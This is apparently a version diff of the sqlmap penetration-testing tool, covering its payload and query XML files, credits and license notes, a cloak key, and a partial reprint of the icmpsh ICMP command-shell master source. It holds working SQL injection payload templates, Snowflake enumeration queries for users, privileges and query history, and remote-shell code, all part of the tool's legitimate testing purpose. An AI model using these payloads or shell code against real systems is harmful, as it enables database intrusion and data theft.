 b14474d467c70f5fe6cb8ed624f79d881c04fe6aeb7d406455da624fe8b3c0df  thirdparty/termcolor/termcolor.py
 4db695470f664b0d7cd5e6b9f3c94c8d811c4c550f37f17ed7bdab61bc3bdefc  thirdparty/wininetpton/__init__.py

data/xml/boundaries.xml

@@ -437,7 +437,7 @@ Formats:
         <clause>9</clause>
         <where>1</where>
         <ptype>1</ptype>
-        <prefix>+(SELECT [RANDSTR] WHERE [RANDNUM]=[RANDNUM]</prefix>
+        <prefix>+(SELECT '[RANDSTR]' WHERE [RANDNUM]=[RANDNUM]</prefix>
         <suffix>)+</suffix>
     </boundary>
 
@@ -446,8 +446,8 @@ Formats:
         <clause>9</clause>
         <where>1</where>
         <ptype>2</ptype>
-        <prefix>+(SELECT '[RANDSTR]' WHERE [RANDNUM]=[RANDNUM]</prefix>
+        <prefix>'+(SELECT '[RANDSTR]' WHERE [RANDNUM]=[RANDNUM]</prefix>
-        <suffix>)+</suffix>
+        <suffix>)+'</suffix>
     </boundary>
     <!-- End of pre-WHERE generic boundaries -->
 

data/xml/errors.xml

@@ -9,6 +9,7 @@
         <error regexp="check the manual that (corresponds to|fits) your MySQL server version"/>
         <error regexp="check the manual that (corresponds to|fits) your MariaDB server version" fork="MariaDB"/>
         <error regexp="check the manual that (corresponds to|fits) your Drizzle server version" fork="Drizzle"/>
+        <error regexp="check the manual that (corresponds to|fits) your TiDB server version" fork="TiDB"/>
         <error regexp="Unknown column '[^ ]+' in 'field list'"/>
         <error regexp="MySqlClient\."/>
         <error regexp="com\.mysql\.jdbc"/>
@@ -237,4 +238,11 @@
         <error regexp="Virtuoso S0002 Error"/>
         <error regexp="\[(Virtuoso Driver|Virtuoso iODBC Driver)\]\[Virtuoso Server\]"/>
     </dbms>
+
+    <dbms value="Snowflake">
+        <error regexp="001003 \(42000\):"/>
+        <error regexp="100038 \(22018\):"/>
+        <error regexp="000904 \(42000\):"/>
+        <error regexp="SQL compilation error: (syntax )?error line \d+ at position \d+"/>
+    </dbms>
 </root>

data/xml/payloads/boolean_blind.xml

@@ -1596,13 +1596,13 @@ Tag: <test>
         <risk>1</risk>
         <clause>1-8</clause>
         <where>1</where>
-        <vector>;SELECT CASE WHEN [INFERENCE] THEN 1 ELSE NULL END</vector>
+        <vector>;SELECT CASE WHEN [INFERENCE] THEN 1 ELSE NULL END FROM DUAL</vector>
         <request>
-            <payload>;SELECT CASE WHEN [RANDNUM]=[RANDNUM] THEN 1 ELSE NULL END</payload>
+            <payload>;SELECT CASE WHEN [RANDNUM]=[RANDNUM] THEN 1 ELSE NULL END FROM DUAL</payload>
             <comment>--</comment>
         </request>
         <response>
-            <comparison>;SELECT CASE WHEN [RANDNUM]=[RANDNUM1] THEN 1 ELSE NULL END</comparison>
+            <comparison>;SELECT CASE WHEN [RANDNUM]=[RANDNUM1] THEN 1 ELSE NULL END FROM DUAL</comparison>
         </response>
         <details>
             <dbms>SAP MaxDB</dbms>

data/xml/payloads/error_based.xml

@@ -2,6 +2,95 @@
 
 <root>
     <!-- Error-based tests - WHERE, HAVING, ORDER BY or GROUP BY clause -->
+    <test>
+        <title>MySQL &gt;= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)</title>
+        <stype>2</stype>
+        <level>1</level>
+        <risk>1</risk>
+        <clause>1,2,3,8,9</clause>
+        <where>1</where>
+        <vector>AND EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'))</vector>
+        <request>
+            <!-- These work as good as ELT(), but are longer
+            <payload>AND EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]'))</payload>
+            <payload>AND EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',(SELECT (MAKE_SET([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]'))</payload>
+            -->
+            <payload>AND EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]'))</payload>
+        </request>
+        <response>
+            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+            <dbms_version>&gt;= 5.1</dbms_version>
+        </details>
+    </test>
+
+    <test>
+        <title>MySQL &gt;= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)</title>
+        <stype>2</stype>
+        <level>1</level>
+        <risk>3</risk>
+        <clause>1,2,3,8,9</clause>
+        <!-- Despite this is an OR payload, keep where to 1 because otherwise it will not work when injecting in ORDER BY or GROUP BY -->
+        <where>1</where>
+        <vector>OR EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'))</vector>
+        <request>
+            <!-- These work as good as ELT(), but are longer
+            <payload>OR EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]'))</payload>
+            <payload>OR EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',(SELECT (MAKE_SET([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]'))</payload>
+            -->
+            <payload>OR EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]'))</payload>
+        </request>
+        <response>
+            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+            <dbms_version>&gt;= 5.1</dbms_version>
+        </details>
+    </test>
+
+    <test>
+        <title>MySQL &gt;= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)</title>
+        <stype>2</stype>
+        <level>2</level>
+        <risk>1</risk>
+        <clause>1,2,3,8,9</clause>
+        <where>1</where>
+        <vector>AND GTID_SUBSET(CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'),[RANDNUM])</vector>
+        <request>
+            <payload>AND GTID_SUBSET(CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]'),[RANDNUM])</payload>
+        </request>
+        <response>
+            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+            <dbms_version>&gt;= 5.6</dbms_version>
+        </details>
+    </test>
+
+    <test>
+        <title>MySQL &gt;= 5.6 OR error-based - WHERE or HAVING clause (GTID_SUBSET)</title>
+        <stype>2</stype>
+        <level>2</level>
+        <risk>3</risk>
+        <clause>1,8,9</clause>
+        <where>1</where>
+        <vector>OR GTID_SUBSET(CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'),[RANDNUM])</vector>
+        <request>
+            <payload>OR GTID_SUBSET(CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]'),[RANDNUM])</payload>
+        </request>
+        <response>
+            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+            <dbms_version>&gt;= 5.6</dbms_version>
+        </details>
+    </test>
+
     <test>
         <title>MySQL &gt;= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)</title>
         <stype>2</stype>
@@ -91,46 +180,6 @@
         </details>
     </test>
 
-    <test>
-        <title>MySQL &gt;= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)</title>
-        <stype>2</stype>
-        <level>4</level>
-        <risk>1</risk>
-        <clause>1,2,3,8,9</clause>
-        <where>1</where>
-        <vector>AND GTID_SUBSET(CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'),[RANDNUM])</vector>
-        <request>
-            <payload>AND GTID_SUBSET(CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]'),[RANDNUM])</payload>
-        </request>
-        <response>
-            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
-        </response>
-        <details>
-            <dbms>MySQL</dbms>
-            <dbms_version>&gt;= 5.6</dbms_version>
-        </details>
-    </test>
-
-    <test>
-        <title>MySQL &gt;= 5.6 OR error-based - WHERE or HAVING clause (GTID_SUBSET)</title>
-        <stype>2</stype>
-        <level>4</level>
-        <risk>3</risk>
-        <clause>1,8,9</clause>
-        <where>1</where>
-        <vector>OR GTID_SUBSET(CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'),[RANDNUM])</vector>
-        <request>
-            <payload>OR GTID_SUBSET(CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]'),[RANDNUM])</payload>
-        </request>
-        <response>
-            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
-        </response>
-        <details>
-            <dbms>MySQL</dbms>
-            <dbms_version>&gt;= 5.6</dbms_version>
-        </details>
-    </test>
-
     <test>
         <title>MySQL &gt;= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)</title>
         <stype>2</stype>
@@ -175,7 +224,7 @@
     <test>
         <title>MySQL &gt;= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)</title>
         <stype>2</stype>
-        <level>2</level>
+        <level>4</level>
         <risk>1</risk>
         <clause>1,2,3,8,9</clause>
         <where>1</where>
@@ -199,7 +248,7 @@
     <test>
         <title>MySQL &gt;= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)</title>
         <stype>2</stype>
-        <level>2</level>
+        <level>4</level>
         <risk>3</risk>
         <clause>1,2,3,8,9</clause>
         <!-- Despite this is an OR payload, keep where to 1 because otherwise it will not work when injecting in ORDER BY or GROUP BY -->
@@ -241,55 +290,6 @@
         </details>
     </test>
 
-    <test>
-        <title>MySQL &gt;= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)</title>
-        <stype>2</stype>
-        <level>1</level>
-        <risk>1</risk>
-        <clause>1,2,3,8,9</clause>
-        <where>1</where>
-        <vector>AND EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'))</vector>
-        <request>
-            <!-- These work as good as ELT(), but are longer
-            <payload>AND EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]'))</payload>
-            <payload>AND EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',(SELECT (MAKE_SET([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]'))</payload>
-            -->
-            <payload>AND EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]'))</payload>
-        </request>
-        <response>
-            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
-        </response>
-        <details>
-            <dbms>MySQL</dbms>
-            <dbms_version>&gt;= 5.1</dbms_version>
-        </details>
-    </test>
-
-    <test>
-        <title>MySQL &gt;= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)</title>
-        <stype>2</stype>
-        <level>1</level>
-        <risk>3</risk>
-        <clause>1,2,3,8,9</clause>
-        <!-- Despite this is an OR payload, keep where to 1 because otherwise it will not work when injecting in ORDER BY or GROUP BY -->
-        <where>1</where>
-        <vector>OR EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'))</vector>
-        <request>
-            <!-- These work as good as ELT(), but are longer
-            <payload>OR EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]'))</payload>
-            <payload>OR EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',(SELECT (MAKE_SET([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]'))</payload>
-            -->
-            <payload>OR EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]'))</payload>
-        </request>
-        <response>
-            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
-        </response>
-        <details>
-            <dbms>MySQL</dbms>
-            <dbms_version>&gt;= 5.1</dbms_version>
-        </details>
-    </test>
-
     <test>
         <title>MySQL &gt;= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)</title>
         <stype>2</stype>
@@ -342,7 +342,7 @@
     <test>
         <title>MySQL &gt;= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)</title>
         <stype>2</stype>
-        <level>3</level>
+        <level>5</level>
         <risk>1</risk>
         <clause>1,2,3,8,9</clause>
         <where>1</where>
@@ -367,7 +367,7 @@
         <!-- It does not work against ORDER BY or GROUP BY clause -->
         <title>MySQL &gt;= 4.1 OR error-based - WHERE or HAVING clause (FLOOR)</title>
         <stype>2</stype>
-        <level>3</level>
+        <level>5</level>
         <risk>3</risk>
         <clause>1,8,9</clause>
         <where>1</where>
@@ -392,7 +392,7 @@
     <test>
         <title>MySQL OR error-based - WHERE or HAVING clause (FLOOR)</title>
         <stype>2</stype>
-        <level>4</level>
+        <level>5</level>
         <risk>3</risk>
         <clause>1,8,9</clause>
         <where>2</where>
@@ -987,7 +987,7 @@
     <test>
         <title>MySQL &gt;= 5.6 error-based - Parameter replace (GTID_SUBSET)</title>
         <stype>2</stype>
-        <level>5</level>
+        <level>3</level>
         <risk>1</risk>
         <clause>1,2,3,9</clause>
         <where>3</where>
@@ -1027,7 +1027,7 @@
     <test>
         <title>MySQL &gt;= 5.0 error-based - Parameter replace (FLOOR)</title>
         <stype>2</stype>
-        <level>2</level>
+        <level>4</level>
         <risk>1</risk>
         <clause>1,2,3,9</clause>
         <where>3</where>
@@ -1276,7 +1276,7 @@
     <test>
         <title>MySQL &gt;= 5.6 error-based - ORDER BY, GROUP BY clause (GTID_SUBSET)</title>
         <stype>2</stype>
-        <level>5</level>
+        <level>3</level>
         <risk>1</risk>
         <clause>2,3</clause>
         <where>1</where>
@@ -1316,7 +1316,7 @@
     <test>
         <title>MySQL &gt;= 5.0 error-based - ORDER BY, GROUP BY clause (FLOOR)</title>
         <stype>2</stype>
-        <level>4</level>
+        <level>5</level>
         <risk>1</risk>
         <clause>2,3</clause>
         <where>1</where>
@@ -1376,7 +1376,7 @@
     <test>
         <title>MySQL &gt;= 4.1 error-based - ORDER BY, GROUP BY clause (FLOOR)</title>
         <stype>2</stype>
-        <level>3</level>
+        <level>5</level>
         <risk>1</risk>
         <clause>2,3</clause>
         <where>1</where>

data/xml/queries.xml

@@ -1786,4 +1786,61 @@
         <search_table/>
         <search_column/>
    </dbms>
+
+    <dbms value="Snowflake">
+        <cast query="CAST(%s AS VARCHAR)"/>
+        <length query="LENGTH(%s)"/>
+        <isnull query="NVL(%s, ' ')"/>
+        <delimiter query="||"/>
+        <limit query="LIMIT %d OFFSET %d"/>
+        <limitregexp query="\s+LIMIT\s+([\d]+)\s+OFFSET\s+([\d]+)"/>
+        <limitgroupstart query="2"/>
+        <limitgroupstop query="1"/>
+        <limitstring query=" LIMIT "/>
+        <order query="ORDER BY %s ASC"/>
+        <count query="COUNT(%s)"/>
+        <comment query="--"/>
+        <concatenate query="%s||%s"/>
+        <case query="SELECT (CASE WHEN (%s) THEN 1 ELSE 0 END)"/>
+        <inference query="ASCII(SUBSTR((%s),%d,1))>%d"/>
+        <banner query="CURRENT_VERSION()"/>
+        <current_user query="CURRENT_USER()"/>
+        <current_db query="CURRENT_SCHEMA()"/>
+        <hostname query="PARSE_JSON(SYSTEM$ALLOWLIST())[0]:host"/>
+        <table_comment/>
+        <column_comment/>
+        <is_dba query="CURRENT_ROLE()='ACCOUNTADMIN'"/>
+        <dbs>
+            <inband query="SELECT SCHEMA_NAME FROM INFORMATION_SCHEMA.SCHEMATA"/>
+            <blind query="SELECT SCHEMA_NAME FROM INFORMATION_SCHEMA.SCHEMATA ORDER BY SCHEMA_NAME LIMIT 1 OFFSET %d" count="SELECT COUNT(*) FROM INFORMATION_SCHEMA.SCHEMATA"/>
+        </dbs>
+        <tables>
+            <inband query="SELECT TABLE_SCHEMA, TABLE_NAME FROM INFORMATION_SCHEMA.TABLES" condition="TABLE_TYPE='BASE TABLE' AND TABLE_SCHEMA"/>
+            <blind query="SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA='%s' ORDER BY TABLE_NAME LIMIT 1 OFFSET %d" count="SELECT COUNT(TABLE_NAME) FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA='%s'"/>
+        </tables>
+        <columns>
+            <inband query="SELECT COLUMN_NAME, DATA_TYPE FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='%s' AND TABLE_SCHEMA='%s'"/>
+            <blind query="SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='%s' AND TABLE_SCHEMA='%s' ORDER BY COLUMN_NAME" query2="SELECT DATA_TYPE FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='%s' AND COLUMN_NAME='%s' AND TABLE_SCHEMA='%s'" count="SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='%s' AND TABLE_SCHEMA='%s'"/>
+        </columns>
+        <dump_table>
+            <inband query="SELECT %s FROM %s"/>
+            <blind query="SELECT %s FROM %s.%s ORDER BY %s LIMIT 1 OFFSET %d" count="SELECT COUNT(*) FROM %s"/>
+        </dump_table>
+        <users>
+            <inband query="SELECT NAME FROM SNOWFLAKE.ACCOUNT_USAGE.USERS"/>
+            <blind query="SELECT NAME FROM SNOWFLAKE.ACCOUNT_USAGE.USERS LIMIT 1 OFFSET %d" count="SELECT COUNT(*) FROM SNOWFLAKE.ACCOUNT_USAGE.USERS"/>
+        </users>
+        <roles/>
+        <privileges>
+            <inband query="SELECT DISTINCT T1.GRANTEE_NAME, T2.PRIVILEGE FROM SNOWFLAKE.ACCOUNT_USAGE.GRANTS_TO_USERS AS T1 JOIN SNOWFLAKE.ACCOUNT_USAGE.GRANTS_TO_ROLES AS T2 ON T1.ROLE = T2.GRANTEE_NAME" condition="T1.GRANTEE_NAME"/>
+            <blind query="SELECT DISTINCT T2.PRIVILEGE FROM SNOWFLAKE.ACCOUNT_USAGE.GRANTS_TO_USERS AS T1 JOIN SNOWFLAKE.ACCOUNT_USAGE.GRANTS_TO_ROLES AS T2 ON T1.ROLE = T2.GRANTEE_NAME WHERE T1.GRANTEE_NAME='%s' ORDER BY T2.PRIVILEGE LIMIT 1 OFFSET %d" count="SELECT COUNT(DISTINCT T2.PRIVILEGE) FROM SNOWFLAKE.ACCOUNT_USAGE.GRANTS_TO_USERS AS T1 JOIN SNOWFLAKE.ACCOUNT_USAGE.GRANTS_TO_ROLES AS T2 ON T1.ROLE = T2.GRANTEE_NAME WHERE T1.GRANTEE_NAME='%s'"/>
+        </privileges>
+        <statements>
+            <inband query="SELECT QUERY_TEXT FROM TABLE(INFORMATION_SCHEMA.QUERY_HISTORY())"/>
+            <blind query="SELECT QUERY_TEXT FROM TABLE(INFORMATION_SCHEMA.QUERY_HISTORY()) ORDER BY START_TIME DESC LIMIT 1 OFFSET %d" count="SELECT COUNT(*) FROM TABLE(INFORMATION_SCHEMA.QUERY_HISTORY())"/>
+        </statements>
+        <search_db/>
+        <search_table/>
+        <search_column/>
+    </dbms>
 </root>

doc/AUTHORS

@@ -1,7 +1,7 @@
-Bernardo Damele Assumpcao Guimaraes (@inquisb)
+Bernardo Damele Assumpcao Guimaraes (@inquisb)
-<bernardo@sqlmap.org>
+<bernardo@sqlmap.org>
-
+
-Miroslav Stampar (@stamparm)
+Miroslav Stampar (@stamparm)
-<miroslav@sqlmap.org>
+<miroslav@sqlmap.org>
-
+
-You can contact both developers by writing to dev@sqlmap.org
+You can contact both developers by writing to dev@sqlmap.org

doc/THANKS.md

@@ -194,9 +194,6 @@ David Guimaraes, <skysbsb(at)gmail.com>
 * for reporting considerable amount of bugs
 * for suggesting several features
 
-Chris Hall, <chris.hall(at)mod10.net>
-* for coding the prettyprint.py library
-
 Tate Hansen, <tate(at)clearnetsec.com>
 * for donating to sqlmap development
 
@@ -535,6 +532,9 @@ Duarte Silva <duarte.silva(at)serializing.me>
 M Simkin, <mlsimkin(at)cox.net>
 * for suggesting a feature
 
+Tanaydin Sirin, <tanaydinsirin(at)gmail.com>
+* for implementation of ncurses TUI (switch --tui)
+
 Konrads Smelkovs, <konrads(at)smelkovs.com>
 * for reporting a few bugs in --sql-shell and --sql-query on Microsoft SQL Server
 

doc/THIRD-PARTY.md

@@ -15,8 +15,6 @@ This file lists bundled packages and their associated licensing terms.
   Copyright (C) 2013, Jonathan Hartley.
 * The `Fcrypt` library located under `thirdparty/fcrypt/`.
   Copyright (C) 2000, 2001, 2004 Carey Evans.
-* The `PrettyPrint` library located under `thirdparty/prettyprint/`.
-  Copyright (C) 2010, Chris Hall.
 * The `SocksiPy` library located under `thirdparty/socks/`.
   Copyright (C) 2006, Dan-Haim.
 
@@ -271,13 +269,13 @@ be bound by the terms and conditions of this License Agreement.
 # MIT
 
 * The `bottle` web framework library located under `thirdparty/bottle/`.
-  Copyright (C) 2012, Marcel Hellkamp.
+  Copyright (C) 2024, Marcel Hellkamp.
 * The `identYwaf` library located under `thirdparty/identywaf/`.
-  Copyright (C) 2019-2020, Miroslav Stampar.
+  Copyright (C) 2019-2021, Miroslav Stampar.
 * The `ordereddict` library located under `thirdparty/odict/`.
   Copyright (C) 2009, Raymond Hettinger.
 * The `six` Python 2 and 3 compatibility library located under `thirdparty/six/`.
-  Copyright (C) 2010-2018, Benjamin Peterson.
+  Copyright (C) 2010-2024, Benjamin Peterson.
 * The `Termcolor` library located under `thirdparty/termcolor/`.
   Copyright (C) 2008-2011, Volvox Development Team.
 

extra/cloak/cloak.py

@@ -21,7 +21,7 @@ if sys.version_info >= (3, 0):
     xrange = range
     ord = lambda _: _
 
-KEY = b"wr36EPIvaR7ZDfb4"
+KEY = b"ZCuk6GdHSj4KtgDq"
 
 def xor(message, key):
     return b"".join(struct.pack('B', ord(message[i]) ^ ord(key[i % len(key)])) for i in range(len(message)))

extra/icmpsh/icmpsh-m.c

@@ -1,134 +1,134 @@
-/*
+/*
- *   icmpsh - simple icmp command shell
+ *   icmpsh - simple icmp command shell
- *   Copyright (c) 2010, Nico Leidecker <nico@leidecker.info>
+ *   Copyright (c) 2010, Nico Leidecker <nico@leidecker.info>
- *   This program is free software: you can redistribute it and/or modify
+ *   This program is free software: you can redistribute it and/or modify
- *   it under the terms of the GNU General Public License as published by
+ *   it under the terms of the GNU General Public License as published by
- *   the Free Software Foundation, either version 3 of the License, or
+ *   the Free Software Foundation, either version 3 of the License, or
- *   (at your option) any later version.
+ *   (at your option) any later version.
- *
+ *
- *    This program is distributed in the hope that it will be useful,
+ *    This program is distributed in the hope that it will be useful,
- *    but WITHOUT ANY WARRANTY; without even the implied warranty of
+ *    but WITHOUT ANY WARRANTY; without even the implied warranty of
- *    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+ *    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
- *    GNU General Public License for more details.
+ *    GNU General Public License for more details.
- *
+ *
- *    You should have received a copy of the GNU General Public License
+ *    You should have received a copy of the GNU General Public License
- *    along with this program.  If not, see <http://www.gnu.org/licenses/>.
+ *    along with this program.  If not, see <http://www.gnu.org/licenses/>.
- */
+ */
-
+
-#include <stdio.h>
+#include <stdio.h>
-#include <stdlib.h>
+#include <stdlib.h>
-#include <sys/types.h>
+#include <sys/types.h>
-#include <sys/socket.h>
+#include <sys/socket.h>
-#include <sys/stat.h>
+#include <sys/stat.h>
-#include <netinet/in.h>
+#include <netinet/in.h>
-#include <netinet/ip_icmp.h>
+#include <netinet/ip_icmp.h>
-#include <netinet/ip.h>
+#include <netinet/ip.h>
-#include <string.h>
+#include <string.h>
-#include <unistd.h>
+#include <unistd.h>
-#include <fcntl.h>
+#include <fcntl.h>
-
+
-#define IN_BUF_SIZE   1024
+#define IN_BUF_SIZE   1024
-#define OUT_BUF_SIZE  64
+#define OUT_BUF_SIZE  64
-
+
-// calculate checksum
+// calculate checksum
-unsigned short checksum(unsigned short *ptr, int nbytes)
+unsigned short checksum(unsigned short *ptr, int nbytes)
-{
+{
-    unsigned long sum;
+    unsigned long sum;
-    unsigned short oddbyte, rs;
+    unsigned short oddbyte, rs;
-
+
-    sum = 0;
+    sum = 0;
-    while(nbytes > 1) {
+    while(nbytes > 1) {
-        sum += *ptr++;
+        sum += *ptr++;
-        nbytes -= 2;
+        nbytes -= 2;
-    }
+    }
-
+
-    if(nbytes == 1) {
+    if(nbytes == 1) {
-        oddbyte = 0;
+        oddbyte = 0;
-        *((unsigned char *) &oddbyte) = *(u_char *)ptr;
+        *((unsigned char *) &oddbyte) = *(u_char *)ptr;
-        sum += oddbyte;
+        sum += oddbyte;
-    }
+    }
-
+
-    sum  = (sum >> 16) + (sum & 0xffff);
+    sum  = (sum >> 16) + (sum & 0xffff);
-    sum += (sum >> 16);
+    sum += (sum >> 16);
-    rs = ~sum;
+    rs = ~sum;
-    return rs;
+    return rs;
-}
+}
-
+
-int main(int argc, char **argv)
+int main(int argc, char **argv)
-{
+{
-    int sockfd;
+    int sockfd;
-    int flags;
+    int flags;
-    char in_buf[IN_BUF_SIZE];
+    char in_buf[IN_BUF_SIZE];
-    char out_buf[OUT_BUF_SIZE];
+    char out_buf[OUT_BUF_SIZE];
-    unsigned int out_size;
+    unsigned int out_size;
-    int nbytes;
+    int nbytes;
-    struct iphdr *ip;
+    struct iphdr *ip;
-    struct icmphdr *icmp;
+    struct icmphdr *icmp;
-    char *data;
+    char *data;
-    struct sockaddr_in addr;
+    struct sockaddr_in addr;
-
+
-
+
-    printf("icmpsh - master\n");
+    printf("icmpsh - master\n");
-    
+    
-    // create raw ICMP socket
+    // create raw ICMP socket
-    sockfd = socket(PF_INET, SOCK_RAW, IPPROTO_ICMP);
+    sockfd = socket(PF_INET, SOCK_RAW, IPPROTO_ICMP);
-    if (sockfd == -1) {
+    if (sockfd == -1) {
-       perror("socket");
+       perror("socket");
-       return -1;
+       return -1;
-    }
+    }
-
+
-    // set stdin to non-blocking
+    // set stdin to non-blocking
-    flags = fcntl(0, F_GETFL, 0);
+    flags = fcntl(0, F_GETFL, 0);
-    flags |= O_NONBLOCK;
+    flags |= O_NONBLOCK;
-    fcntl(0, F_SETFL, flags);
+    fcntl(0, F_SETFL, flags);
-
+
-    printf("running...\n");
+    printf("running...\n");
-    while(1) {
+    while(1) {
-
+
-        // read data from socket
+        // read data from socket
-        memset(in_buf, 0x00, IN_BUF_SIZE);
+        memset(in_buf, 0x00, IN_BUF_SIZE);
-        nbytes = read(sockfd, in_buf, IN_BUF_SIZE - 1);
+        nbytes = read(sockfd, in_buf, IN_BUF_SIZE - 1);
-        if (nbytes > 0) {
+        if (nbytes > 0) {
-            // get ip and icmp header and data part
+            // get ip and icmp header and data part
-            ip = (struct iphdr *) in_buf;
+            ip = (struct iphdr *) in_buf;
-            if (nbytes > sizeof(struct iphdr)) {
+            if (nbytes > sizeof(struct iphdr)) {
-                nbytes -= sizeof(struct iphdr);
+                nbytes -= sizeof(struct iphdr);
-                icmp = (struct icmphdr *) (ip + 1);
+                icmp = (struct icmphdr *) (ip + 1);
-                if (nbytes > sizeof(struct icmphdr)) {
+                if (nbytes > sizeof(struct icmphdr)) {
-                    nbytes -= sizeof(struct icmphdr);
+                    nbytes -= sizeof(struct icmphdr);
-                    data = (char *) (icmp + 1);
+                    data = (char *) (icmp + 1);
-                    data[nbytes] = '\0';
+                    data[nbytes] = '\0';
-                    printf("%s", data);
+                    printf("%s", data);
-                    fflush(stdout);
+                    fflush(stdout);
-                }
+                }
-                
+                
-                // reuse headers
+                // reuse headers
-                icmp->type = 0;
+                icmp->type = 0;
-                addr.sin_family = AF_INET;
+                addr.sin_family = AF_INET;
-                addr.sin_addr.s_addr = ip->saddr;
+                addr.sin_addr.s_addr = ip->saddr;
-        
+        
-                // read data from stdin
+                // read data from stdin
-                nbytes = read(0, out_buf, OUT_BUF_SIZE);
+                nbytes = read(0, out_buf, OUT_BUF_SIZE);
-                if (nbytes > -1) {
+                if (nbytes > -1) {
-                    memcpy((char *) (icmp + 1), out_buf, nbytes);
+                    memcpy((char *) (icmp + 1), out_buf, nbytes);
-                    out_size = nbytes;
+                    out_size = nbytes;
-                } else {
+                } else {
-                    out_size = 0;
+                    out_size = 0;
-                }
+                }
-
+
-                icmp->checksum = 0x00;
+                icmp->checksum = 0x00;
-                icmp->checksum = checksum((unsigned short *) icmp, sizeof(struct icmphdr) + out_size);
